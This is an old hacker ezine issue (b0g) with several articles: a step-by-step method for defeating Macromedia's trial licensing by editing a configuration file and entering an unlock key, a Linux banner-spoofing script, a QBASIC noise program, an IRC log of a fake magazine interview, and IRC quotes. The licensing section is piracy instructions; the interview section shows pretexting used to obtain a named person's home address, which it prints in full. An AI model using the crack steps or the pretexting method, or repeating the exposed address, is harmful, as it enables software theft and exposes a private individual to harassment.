Email:shadowwolf@progen.zzn.com
ICQ:55533799
AIM:Thief696
|=======|
|[Notes]|
|=======|
This is my first article for b0g and I hope to write (err....type) many
more in the future. Also pay a visit to http://www.blackcode.com. A damn good
site with alot of resources/files and also whatch for my articles in issue #3 of
the ezine. And to see some of my older texts visit
http://www.textfiles.com/uploads. I really apreciate all the response I get from
my articles and text files so don't be afraid to drop me a message saying hi or
ask a question. Laterz.....
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[15:. - [ How to crack macromedia products ] [anonymous] :. ]
[you-are-0wned@macromedia.com] :. ]
____________________________________________________________________
WTF is crackomedia? Crackomedia is my own version of
cracking Macromedia products. Macromedia have came up with
this gay shit call Electronic Software Distribution. What it
basically is that you download their software and you'll get a 30 days
trial period. After that, if you want it, you get buy it directly
through the software and they give you this key code so you'll get the
full version. Basically, I am no beans against Macromedia but I
do really hate them for setting their software so high price... I
mean a fucking Macromedia Authorwave for $2,713.99 US...
what a fucking rip off.
Okay. For all ya wannabe l33t crackers out there who
really want to crack all kinds of Macromedia software, Here is
what ya do.
1. Download any copy of Macromedia Software
2. Run the program and go to buy
3. Fill it all those junks with bullshits and click next
twice
4. You be ask you enter your credit card # and shit.
Select Visa, and for credit card, put 16 "0's" and fill in the
information with Bullshit.
5. After that, click cancel and exit to quit the program.
********** WTF?!!? QUIT!! YOU FUCKING KRAZY!! *********
6. Go to c:\windows if you 0wn win9x or c:\winnt for
win2k and NT users
7. Find a configuration file call rsagent
8. Open it with notepad and edit the line
mailStat-391842=0
to
mailStat-391842=1
9. Then save it.
10. Open the Macromedia Software again and it goes to a
freaking thing where you're going to get your S/N from mail.
There, you use "YHBIFXYXSC" as the unlock key code. After
use it again as the Serial Number.
Then it'll say your software is being pepeare and bla bla bla.....
After youre prompt with a thingy where you put your
organization shits, Company and your serial Number. Try to fill
it in if you want but is useless. You still haven't complete
cracked the Macromedia Software!!!
Now! I hope you didn't delete the installation program to install
your Macromedia program, because you'll need it.
Okay anyway. reinstall it again. After you done reinstalling, run
the Macromedia program and it'll go "Being pepper and blabla
THEN BOOM!!! The gay Trial period Electronic Software
Distribution is gone and the software is yours without being
annoyed and hurting your wallet.
I cracked Flash4, Dreamweaver UltraDev and Firework 3 with my
Crackomedia method. So enjoy it.
If some people want to bust their l33t programming skills and
make a crack using this method, please do gimme so credit.
No Applause Please :)
O
|/ ___O OOOOOOOHHHHH"
|--| \
| |
Macromedia getting 0wned by Crackomedia :)
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[16:. - [ hax0r trick ] [timidu] :. ]
[timidu@b0g.org] :. ]
____________________________________________________________________
Are you sick of your friends telnetting over your brand Linux box and
"heh"-ing when they see that you have a RedHat and especially if it's a
buggy one? Well .. here is how you can replace your RedHat Linux with a
brand new one distro in just 30 secs.
1) Log in as root.
2) Make this phile called whatever you desire and taken from below with
the famous copy&paste >:>
Let's say you create it in /etc and you call it "initver"
# pico /etc/initver
3) Think of a really cool name. For example "Puffy Linux" (You might as
well use "b0g Linux" but , heh , who'd believe that there's a coder at
b0g) . I'll stick at "Puffy Linux" version 3.5 , you can use whatever you
want.
--cut here--
#!/bin/bash
echo > /etc/redha
t-release
echo "Puffy Linux release 3.5 (Cheese)" >> /etc/redhat-release
cp -f /etc/redhat-release /etc/issue
# Next .. for the kernel . The latest kernel at this moment that i'm
# writing is 2.4.0-test1 . So ... :
echo "Kernel 2.4.0-test1 on an i786" >> /etc/issue
echo >> /etc/issue
cp -f /etc/issue /etc/issue.net
--stop cutting , dork--
You might as well replace "i686" with "alpha" >:>
This phile , in case you haven't figured out yet , replaces that nasty
telnet banner with one made by YOU .
As damn RedHat rewrites it at every boot , we have to make sure that our
replacement will be made last.
For this you have to add it in /etc/rc.d/rc.local for example. So ..
# chmod +x /etc/initver
# echo "/etc/initver" >> /etc/rc.d/rc.local
6) Now reboot , you'll have a pleasant surprise. Or you'll OS will be
totally fucked up >:/
P.S. : nmap WILL detect it right , morons . So , if your friends are eleet
, this method won't do
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[17:. - [ Fun with noise in QBASIC ] [niemand1] :. ]
[niemand1@b0g.org] :. ]
____________________________________________________________________
Note: you need an internal PC speaker for this to work on your computer,
otherwise nothing will happen and it will just be damn boring.
Here is my program:
'Funny Sounds By: niemand1 4/27/2000
CLS
DO
frequency% = RND * 1000
IF frequency% < 37 THEN frequency% = 37
duration% = 1
SOUND frequency%, duration%
LOOP UNTIL INKEY$ = CHR$(27)
END
What it does:
CLS (clears text from DOS)
DO (Begins a loop process)
frequency% = RND * 1000 (Makes a random number between 1 and 1000)
IF frequency% < 37 THEN frequency% = 37 (I'll explain this later)
duration% = 1 (Value can be changed to make each sound longer)
SOUND frequency%, duration% (Plays a sound of specified freq. and dur.)
LOOP UNTIL INKEY$ = CHR$(27) (Loops until esc key is pressed)
END
This program makes a random number between 1 and 1000 and uses that number
as a frequency to play through the computers PC speaker, then repeats the
process until you hit the esc key. When run it makes a ton of annoying
sounds that might drive your parents insane, when they start yelling, hit
the esc key so you are not hit in the face. What can you do with this
program? I have no fucking clue, but I just think it's a funny way to learn
the sound command.
The reason for the fourth line is this:
If you try to play a sound in a frequency lower than 37 the program craps up
because the computer won't allow sounds of those low frequencys. Why? I have
no idea, but if you figure it out, e-mail me at niemand1@hotmail.com.
You can change the value of the third line to do make lower
frequency sounds only, or change it to as high as 32,767. If you set it for
32.767, you might get some high pitched sounds that annoy the hell out of
animals sensitive to noise, not recommended to dog owners. If you set it for
any higher than 32,767, the program will crap up because your computer
can't handle sounds any higher pitched than that.
You can change the value of duration% to make the short sounds play longer,
but it does not sound as funny.
Oh yeah, one more thing:
I made this program messed up on 240 miligrams of DXM in case you were
wondering where I get psychotic ideas like this. I thought it was pretty
damn funny while I was tripping and saved it.
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[18:. - [ pulling people's doc's on irc ] [wh0rde] :. ]
[wh0rde@b0g.org] :. ]
____________________________________________________________________
The Interview of a lifetime
(with a dude that claims to be a former member of Global Hell):
Note: I am not this stupid! This is for your enjoyment!
[21:39] Mclark is ~matt@dsl-64-34-123-253.telocity.com
[21:39] Mclark is «Matt Clark»
[21:39] Mclark on Baltimore.MD.US.Undernet.Org
This would be me.
IRC log started Fri Jun 23 20:22
-> *scott-* Excuse me, I'm from a magazine, and was wondering if you would
participate in an interview?
*Scott-* First off do you know who i am?
*Scott-* second of all what kind of magizine?
-> *scott-* I was told by some people from #hackphreak to talk to you, and its a
small computer magazine.
*Scott-* Do you know who i am?
-> *scott-* No, I'm sorry?
*Scott-* No, its okay just don't want people knowing who i am.
*Scott-* Okay what kind of questions will i be asked?
-> *scott-* The secretive type huh?
*Scott-* and whats the magizine called and will i get a copy?
*Scott-* Im not allowed to be on here as it is
-> *scott-* Just some opinion questions, its called Computer Currents, and if
you would like a free subscription you can have one.
-> *scott-* Be on where? Online?
*Scott-* yes, online.
-> *scott-* Are you in trouble with someone?
*Scott-* Im not in the possition to discuss anything.
-> *scott-* Ok, well would it be ok to conduct the interview?
*Scott-* sure..
-> *Scott-* The first thing in the column is I need a small introduction, how
old you are, what state maybe, how many years you have been using computers,
etc.
*Scott-* Im 18, I live in florida at the moment moving tuesday, ive been using
computers for about 6 maybe 7 years now.
*Scott-* Im also a network admin but can't get online lol.
-> *scott-* Would it be ok to use your nickname?
*Scott-* yeah
-> *scott-* The next question is what computer platform you prefer, and a short
description why you chose that one?
*Scott-* just put Scott
-> *scott-* Sure thing
*Scott-* I like linux very easy not all this grafical innerface stuff
*Scott-* just plain console
-> *scott-* Hah, very professional!
-> *scott-* What kind of network do you administer?
*Scott-* Linux Slackware 7.0 and Windows Server 2000
*Scott-* Windows Server 2000 is bullshit from what i have seen.
-> *scott-* Ok, now on to the opinions, if you don't want to answer just say no
comment.
*Scott-* Okay..
-> *scott-* What do you think of the state of the nation's computer security?
Many hundreds of government computers have recently been attacked and they are
looking for young help, is this a good idea?
*Scott-* Yes i do like for an example ive actually been offerd a job with the
goverment.
-> *scott-* Would it be ok to ask what part?
*Scott-* OSI - Office of Secret Investigations also Netowkr admin jobs on
goverment computers.
*Scott-* err Network
-> *scott-* Very cool!
-> *scott-* Next question is what about DoS, what can we do to prevent it?
*Scott-* There isn't much we can do about it, People can gain access into
machines that have alot of bandwidth and im sorry there is no server gonna stay
up with people having access to this kind of bandwidth.
-> *scott-* Is the FBI's idea of a DDoS anti-tool a good one or is it just
something to get others off their backs?
*Scott-* Seriously i think its something to get people off there backs, to many
machines with bandwidth the servers are going to die.
-> *scott-* Has your network ever come under the attack of a DoS flood?
*Scott-* Many times, punks these days.
-> *scott-* I saw you were in the channel "lpsg," is this is a hacking
organization? (I will remove the name in the article)
*Scott-* No its just a big joke called Large Penis Support Group
-> *scott-* Ok, Ill remove that one, not very relevant.
-> *scott-* Do you consider yourself a hacker?
*Scott-* no kidding we talk about viagra on the website
*Scott-* No and never will be one.
-> *scott-* If you were to term yourself as something, what would it e?
-> *scott-* Sorry, Be.
*Scott-* Always consider myself a person that has enough knowledge to get
himself by
*Scott-* I don't consider myself anything..
-> *scott-* Just a couple questions to show general knowledge to my readers, can
you define MAC?
*Scott-* Well explain first of all which MAC there are programs called MAC there
are OS's called MAC machines called MAC
*Scott-* i mean alot of things so you need to specify which MAC you wanting me
to define.
-> *scott-* Specifically MAC addresses
-> *scott-* As related to networking
*Scott-* ahh...
*Scott-* Actually if you don't mind i really don't even want to go into
networking go into exploiting and diffrent things in that nature.
*Scott-* if you don't mind
-> *scott-* Well how about CSMA/CD?
*Scott-* hold on im going to get you refrences im going to send you a big file
of shit ive wrote on sorts of things, sattilites, networking, phreaking
*Scott-* things like that..
-> *scott-* Ok
*Scott-* My networking text was from when i was with gH.
-> *scott-* You were a member of the infamous gH?
*Scott-* yes sir i was.
-> *scott-* Were you raided by the FBI?
*Scott-* i was on CNN 2 times
*Scott-* Yes sir i was raided 2 times.
*Scott-* I was on MSNBC once
*Scott-* and ABC in the morning once
-> *scott-* You were interviewed?
*Scott-* Many times also had TV Reports at my house.
*Scott-* ask mindphasr mosthated diesl0w anybody from them who i am, they will
tell you..
-> *scott-* So you're quite a famous person I've stumbled on! This is very
interesting!
*Scott-* famuos no i don't consider it that.
-> *scott-* Can we go back to some networking basics though? I always try to
show to what degree network adminstrators are educated.
*Scott-* I consider it paying for what ive done.
*Scott-* Networking Basic's are alot more simpler them are kinda hard questions
im trying to remember from my Network+ class.
-> *Scott-* Oh I'm sorry I thought you were a network adminsitrator?
*Scott-* Yes im a network admin just started though
*Scott-* lol
*Scott-* just getting my certs and just got me a job at synergy networks.
*Scott-* blank out synergy
-> *scott-* Oh ok, do you know what a MAC address or what CSMA/CD is?
-> *scott-* Sure
-> *scott-* And what Certifications are you applying for?
*Scott-* MCSE, Network+, finished my A+
*Scott-* Server 2000
-> *scott-* Very nice
*Scott-* but i could be wrong
*Scott-* but
*Scott-* is it
*Scott-* media access control?
*Scott-* or someshit
-> *scott-* Yes! Thats exactly right actually
*Scott-* dood its been awhile
*Scott-* heh
-> *scott-* And CSMA/CD?
*Scott-* ermm i remember the last half but not the first let me think
-> *scott-* Sure take your time
*Scott-* what magazine is this?
-> *scott-* Computer Currents
*Scott-* CSMA/CD has to do with ethernet currect?
-> *scott-* Yes, do you know what it stands for?
*Scott-* something like Carriers Sense Multiple Access / Collision Detections or
some bs
*Scott-* thats problable way off
-> *scott-* Its very close
*Scott-* ahh
*Scott-* is it Carrier Sense Multiple Access / Collision Detection ?
*Scott-* i cant remember if theres multiples or not
-> *scott-* Yes that is one version of it
-> *scott-* Now for some easy questions, do you know what 10base2 and 1base5 are
*Scott-* ethernet cards..
*Scott-* correct?
-> *scott-* Yep
-> *scott-* Want to try for a harder one?
*Scott-* sure
-> *scott-* Do you know what the purpose of SQE test signals are? In relations
to AUI-based equipment?
*Scott-* wow.. i think i know this one actually man this shit needs to hit me
though ugh..
-> *scott-* Sure
*Scott-* Theyre denial of service attacks based on AUI packets sent in a
repetitive fashion until the machine's processor basically melts
*Scott-* or something close to that if i recall
-> *scott-* Wow, thats great!
*Scott-* dood if you can't tell im kinda slow i got a bad memory heh takes me
awhile to think.
-> *scott-* Do you know what BNC networking is?
-> *scott-* No its fine, really youre doing great
*Scott-* okay there again i know of 2 BNC'ing
-> *scott-* In relation to networking
*Scott-* theres BNC you setup to bounce of another machine on a port to give
yourself another IP getting onto another network
-> *scott-* Actually just spit out both I guess
-> *scott-* Ok
*Scott-* off even
*Scott-* that the one your looking for?
-> *scott-* No, the other one
*Scott-* dood the second one i have no clue bro
*Scott-* Bioelectric Networking Cues?
*Scott-* thats the only thing i can think of
-> *scott-* Perfect! You're an extremely talented network engineer!
-> *scott-* One more questions?
*Scott-* omg that was totally a geuss
*Scott-* sure..
-> *scott-* How about ipmasq and bASH and how they relate?
*Scott-* trying to kill someone here? hehe
-> *scott-* Hehe, you seem to know all the other iPSEq questions..
*Scott-* no it just takes me awhile to remember half this shit
*Scott-* i took a course 2 years ago i think it was in highschool on networking
-> *scott-* Sure
*Scott-* but im gonna take a shot at this one
-> *scott-* Shoot
*Scott-* Ipmasq is a counter-DDoS tool when used with bASH, generally on Irix
platforms, the FBI designed this codec to stop the attacks on yahoo and shit
-> *scott-* Damn, no wonder the government is recruiting you!
*Scott-* heh
-> *scott-* Well thanks you very much! I look forward to publishing this, and
Ill remember to take out those names.
*Scott-* If you were on the computer for 6 years
-> *scott-* Do you want a free subscription? (As long as you live in the US)
*Scott-* yeah
*Scott-* i do..
-> *scott-* Sure, just give me the address, zip, and any name you want us to use
for security I guess, hah!
*Scott-* Scott O'Donnell , 2895 50th terris s.w. naples florida 34117
-> *scott-* Would you be possibly interested in conducting a phone interview?
We're trying to start a webcast with the Real Networks people?
*Scott-* sure i will do it just you got to come on and find me and i will do
it..
*Scott-* i use to write
*Scott-* for HCC
-> *Scott-* What is HCC?
*Scott-* hackchat.com
*Scott-* i took it down after awhile when i was getting busted
-> *scott-* Troubled times huh? Hah! Well ok, you take care and try not to get
"Busted" anymore!
-> *scott-* I got you're subscription filled out and filed, thanks for your
time.
*** IRCII settings saved to /home/matt/.ircrc
Now during the interview me and hst were talking, since I saw hst knew that I
was talking with Scott-, because in #lpsg Scott- put this:
[20:42] (@Scott-): CSMA/CD
[20:42] (@Scott-): wtf is this kid on
[20:42] (@Scott-): wtf is that bs?
Now heres what I could recover of the logs of me and hst talking:
[20:51] (hst): HEh
[20:51] (wh0rde): do it
[20:51] (hst): he just asked me what a amc address was
[20:51] (wh0rde): LOL
[20:51] (wh0rde): feed him bullshit NOW
[20:51] (hst): i did
[20:52] (wh0rde): yeah
[20:52] (wh0rde): *Scott-* is it
[20:52] (wh0rde): *Scott-* media access control?
[20:52] (wh0rde): *Scott-* or someshit
[20:52] (wh0rde): -> *scott-* Yes! Thats exactly right actually
[20:54] (wh0rde): give him csma/cd
[20:54] (hst): i did
[20:55] (wh0rde): what did you tell him
[20:56] (hst): i told him the answer
[20:56] (hst): you want me to tell him whack shit?
[20:58] (wh0rde): yes!
[20:58] (wh0rde): dont retell csma/cd though
[20:58] (wh0rde): hes gonna ask What is the purpose of the SQE test signal
provided on AUI-based equipment?
[20:59] (wh0rde): tell him its denial of service or something
[20:59] (hst): omg
[20:59] (hst): this is so fucking funny
[20:59] (hst): you have to give me the logs of this
[20:59] (hst): right after you are done
[20:59] (wh0rde): I will
[20:59] (hst): what shoukld i say
[20:59] (hst): he asked
[20:59] (wh0rde): denial of service attacks
[20:59] (hst): liek
[20:59] (hst): give me the words
[20:59] (wh0rde): wait
[21:00] (wh0rde): Theyre denial of service attacks based on AUI packets sent in
a repetitive fashion until the machine's processor basically melts
[21:01] (hst): EHh
[21:01] (hst): that is funny
[21:01] (hst): would you like to know the real purpose
[21:01] (hst): or do you already know?
[21:01] (wh0rde): I have no idea
[21:02] (hst): the purpose of the SQE test signal is to test the
[21:03] (hst): collision detection electronics of the
[21:03] (hst): tranceiver
[21:03] (hst): and to let the ethernet interface
[21:03] (wh0rde): ok
[21:03] (wh0rde): for this one
[21:03] (wh0rde): Bielectric Networking Cues
[21:03] (wh0rde): no
[21:03] (wh0rde): Bioelectric
[21:03] (hst): know that the collision detectino circuits nd signal paths are
working correctly
[21:04] (wh0rde): k
[21:04] (wh0rde): hes gonna ask you in a sec
[21:04] (hst): Bio Electric networkign cues?
[21:05] (hst): heh
[21:05] (hst): and you want me to say?
[21:05] (wh0rde): no the question is BNC
[21:05] (hst): HAHAH
[21:06] (hst): BNC networkign
[21:06] (wh0rde): he actually knows what bnc really is..
[21:06] (wh0rde): but I told him theres 2 versions of it
[21:06] (wh0rde): Bioelectric Networking Cues
[21:06] (hst): i would give you logs
[21:06] (hst): fo what he is msging me
[21:06] (hst): But
[21:06] (hst): HEH
[21:06] (hst): they are to funnt
[21:07] (wh0rde): more questions
[21:08] (hst): about?
[21:08] (wh0rde): uhm
[21:08] (wh0rde): lets see
[21:10] (wh0rde): "Ipmasq is a counter-DDoS tool when used with bASH, generally
on Irix platforms, the FBI designed this codec to stop the attacks on yahoo and
shit"
[21:10] (hst): HAHAHAHAHAHAHAHAHAHAHA
[21:10] (hst): i cannot say that
[21:11] (hst): that makes me feel stupid
[21:11] (wh0rde): NO
[21:11] (wh0rde): SAY IT AND MEAN IT!
[21:12] (hst): HAHAHAH
[21:12] (hst): I CANT
[21:12] (hst): BHAHAHAHAHAHAHAHAHAHAHA
[21:12] (hst): omg
[21:12] (hst): Im crying
[21:13] (wh0rde): hehehehe
[21:13] (hst): heh
[21:13] (hst): i could'nt breathe for a min
[21:13] (hst): i want LOGS
[21:13] (hst): RIHGT AFter you are finished
[21:14] (wh0rde): heh
[21:16] (hst): are you done
[21:16] (hst): you know
[21:16] (hst): ib have this man logged
[21:16] (wh0rde): yeah but theres more leetness to come
[21:16] (hst): asking me the questions
[21:16] (hst): HEH
[21:16] (wh0rde): dont say anything
[21:16] (wh0rde): I will
[21:16] (hst): i have to show this to dayzee
[21:17] (hst): Did that fucker
[21:17] (hst): actually say
[21:17] (hst): Ipmasq is a counter-DDoS tool when used with bASH, generally on
Irix platforms, the FBI designed this codec to stop the attacks on yahoo and
shit
[21:17] (wh0rde): yep
[21:17] (wh0rde): exactly
[21:17] (wh0rde): dont say anythign to him yet
[21:17] (hst): HEH
[21:17] (hst): What a mind blower
[21:17] (hst): i thought he actually had skills
[21:18] (hst): now that i think about it
[21:18] (hst): i never actually
[21:18] (hst): saw this man do anything
[21:19] (wh0rde): yeah
[21:19] (wh0rde): hes an idiot
WOW I GOT THIS KIDS INFOS, BY PRETENDING TO BE A MAGAZINE EDITOR. **PLEASE DO
NOT LET THIS KID KNOW I DID THIS, OR HE WILL TELL EVERYONE, AND THEN I CANT DO
IT ON A REGULAR BASIS. YOU WANT ME TO DO THIS ON A REGULAR BASIS!!!!**
*/
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[19:. - [ IRC Quotes ] [k-rad-bob] :. ]
[k-rad-bob@b0g.org] :. ]
____________________________________________________________________
<grid> you might think you are a hacker because you can code, but you will never be a real hacker like me
<skatoni> will some one please help
<`NeXiGeN`> what's yer problem ?
<skatoni> there is a guy hacking into my computer
<`NeXiGeN`> unplug yer modem
<skatoni> how?
<`NeXiGeN`> see all those wires behind your computer box ?
<`NeXiGeN`> ripem all out
*** skatoni has quit IRC (Read error to skatoni[ppp012.rosenet.net]:
Connection reset by peer)
<niemand1> i heard if you put your car keys next to the fone line from the modem, it will disconnect you
<Wizbone> no, he's too poor like me... and like me, he'll be staying at
home, watching pornos and eating cheezies, wondering all the while why
his dick is orange
<vuduisz> decaf cocaine is better for you
<Accipitri> can someone awnser one question for me?
<Accipitri> how do you change your screen resoultion in linux?
enlightenment i believe
<ReDPriest> x86config
<Accipitri> hehe red....dont understand that....when i said newbie to
linux i mean....i installed it
lastnight
<ReDPriest> ah
<ReDPriest> Type x86config in console
<Accipitri> lol....console? im using gui interface i think....graphical
thing
<Diabolita> X?
<ReDPriest> yep
<Accipitri> where is the console?
<ReDPriest> It will open a black window that looks like a DOS prompt or
whatever
<ReDPriest> Or right when u login
<ReDPriest> Dont startx just type x86config
<Accipitri> dont know how to get into the console from where i am
<Accipitri> ok, in regular xterm
<Accipitri> what do i do now?
<Accipitri> im in the xterm regular....dont know what to do...
<AcidKick> type in x86config
<Accipiter> um
<Accipiter> XF86Setup is a hell of a lot easier.
<AcidKick> or is it xf
<AcidKick> either way
<Accipitri> command not found
<Accipiter> well
<Accipiter> you need to exit X first.
<Accipitri> ok, how....
<Accipiter> Accipitri >> CTRL+ALT+Backspace
*** Accipitri has quit IRC (Read error to
Accipitri[cr420407-a.lndn1.on.wave.home.com]: EOF from client)
<Accipiter> hahahaha
<ReDPriest> haha
<Accipiter> he was using an X chat client
<fraggy-fu> quro soto booyah loto komiero messtah render
<RenderMan> WTF?
<nach0> you know. wtf is context-sensitive. it's
(w-question-word)-the-fuck. is it What? is it Why? is it
Who? wtf is WTF? or the universal interrogative
<buckleet> i ahve to takeover #hack now
<buckleet> anyone want to help?
...... some time passes........
<buckleet> SOMEONE UNBAN ME FROM #HACK
<buckleet> please
<fraggie> drugs is bad
<fraggie> for health you
<fraggie> maker type reatrded very
<fraggy> i wonder if any crooked cops ever make drunk people give em head. "now sir. just blow hard into the machine. yep. thats
it. keep blowing. ...... ok sir. you're not drunk. off you go"
<E-Vile> I have an odd request... can anyone present here with any nukeing progs try to nuke me please??
<LEE-> it was me that took out yahoo with ma mates and panther modem
<cyber-cre> who knows what a port scanner is?
*** Joins: lore (lore@rtfm.insomnia.org)
<lore> b0g is really bad.
<lore> it tries to be what we did with b4b0
<lore> but fails because it has hardly any technical content
<lore> give it up
*** Parts: lore (lore@rtfm.insomnia.org)
<twist> <Prae> james' mom is a cum guzzling whore :( <-- MY FUCKIMNG MOM JUST READ THAT YOU ASSHOLE
[23:28] (+tak): me and josh are gonan do ecstacy
[23:28] (+tak): with 2 girls
[23:28] (+tak): will we have sex?
Virtus[~pirch@ppp9-jkt3.indosat.net.id] has joined #2600hackers
<Virtus> How do I Nuke people?
<Freesoul> hahaha
<R4Z0r> LMAO
<KiLLeRBiTe> just type /con/con
<Virtus> thanks man
(Read error to Virtus[ppp9-jkt3.indosat.net.id]: Connection reset by peer)
<fUnKyF|Ow> how can i get a email acount?
<fUnKyF|Ow> help me plz
<thep0et> bob
<thep0et> guess what
<thep0et> i landed a 20 dollar an hour contract making layouts
<k-rad-bob> really?
<thep0et> yes
<k-rad-bob> thats ubergreat
<k-rad-bob> what firm?
<thep0et> now i can get money
<thep0et> and a car
<thep0et> and fuck people
<k-rad-bob> haha
<thep0et> bob i am gonna have so much sex
<Prae> people who make graphics are sexually inadiquette
<MisterX> heh
<MisterX> this copper
<MisterX> tryed to bust me for toking
<+Quantico> shit my arse is hurting
<MisterX> the other day
<+Quantico> lol
<MisterX> and he says
<MisterX> have u been in trouble with the police before
<MisterX> i said yes
<MisterX> he said what for
<MisterX> i said
<MisterX> drugs and hacking
<+Quantico> hehe
<MisterX> he said hacking?
<MisterX> i said yeah
<MisterX> i hacked into railtrack and changed train times
<MisterX> and lloyds of london
<MisterX> and he said
<MisterX> oh ok
<MisterX> and kinda walked off
<MisterX> that was after he tryed to search for the draw
<MisterX> in pitch black
<MisterX> with a little flash light
<MisterX> but the fnny thing is
<MisterX> he saw me throw it out of a fag packet
<MisterX> when he arrived
<MisterX> but he couldnt find it
<MisterX> he ripped up the fag packet totally
<MisterX> then he search for about 10 minutes
<MisterX> trying to find it on the floo
<MisterX> r
<MisterX> and he didnt realise we were underage drinking either
<MisterX> so we were just sat their downing our booze while he was wondering around us
<MisterX> quite a funny situation i thought
[01:17] JULIO [fraggy@24.67.114.205.ab.wave.home.com] has joined #2600
[01:18] <JULIO> likwid, you silly hoe. sup
[01:18] <JULIO> ATTENTION
[01:18] <likwid> julo - you would be....
[01:18] <likwid> lol
[01:18] <JULIO> DOES ANYONE HERE HAVE ANY GREY POUPON?
[01:18] <Scavenger> I do
[01:18] <JULIO> I NEED THE GREY POUPON PLZ
[01:18] <JULIO> I NEED THE GREY POUPON TO HACK MY CHEATING GIRLFRIENDS EMAIL
ACCOUNT
[01:18] <likwid> lol
[01:18] <JULIO> PLZ HELP ME
[01:18] <supruzr> heh
[01:19] likwid passes JULO the grey poop on...
[01:19] <likwid> lol
[01:19] <supruzr> fragmental wants to be the 3rd Jerky Boy
[01:19] <supruzr> er
[01:19] <supruzr> i mean JULO
[01:20] <Scavenger> bah
[01:20] <likwid> fraggy! sup man??
[01:20] fraggie [fraggy@24.67.114.205.ab.wave.home.com] has joined #2600
[01:20] <fraggie> oopz
[01:21] fraggie is now known as JUL1O
[01:21] <JUL1O> ATTENTION
[01:21] supruzr [supruzr@tnt14b-26.focal-chi.corecomm.net] has quit IRC
(ZERO *POOF*)
[01:21] <likwid> ah... i'm bored...
[01:21] <Scavenger> heh
[01:21] JULO [fraggy@24.67.114.205.ab.wave.home.com] has quit IRC (Read
error: 104 (Connection reset by peer))
[01:21] <JUL1O> THE GREY POUPON HACKED ME GOOD
[01:21] <Deeply> weird
[01:21] <likwid> lol
[01:21] JUL1O is now known as JULIO
[01:22] <JULIO> IF NE1 KAN CONTROL THE GREY POUPON, PLZ /QUEER ME
[01:22] <Scavenger> heh
[01:22] <JULIO> I MEAN
[01:22] <JULIO> QUERY ME
[01:22] <Deeply> any old ddialers here?
[01:23] <Scavenger> Well Im out
[01:23] <JULIO> I EM AN DDIALERS PERSON
[01:23] <Scavenger> aufweidershen
[01:23] pPCpunk [pPCpunk@ip137.pascagoula2.ms.pub-ip.psi.net] has quit IRC
(blow me)
[01:23] pPCpunk [pPCpunk@ip137.pascagoula2.ms.pub-ip.psi.net] has joined
#2600
[01:23] <likwid> later Scavenger
[01:23] <BiTcH> [pPCpunk] Liquer in the front... Poker in the rear...
[01:23] Scavenger is now known as Scavenger[sleep]
[01:23] <Scavenger[sleep]> later
[01:23] <JULIO> DOEZ NE1 WANNA SEE MY PIC?
[01:24] <likwid> uhh lol i dunno do we?
[01:24] <pPCpunk> anyone got a wingate I can use?
[01:24] <JULIO> ITZ REALLY ELITE
[01:24] <JULIO> http://www.sp0rk.org/pictures/zig5.jpg
[01:24] <likwid> lol
[01:24] <JULIO> I EAT ONE OF THOZE FOR BREAKFAST EVERY DAY
[01:24] Deeply is now known as DeeplyShrouded
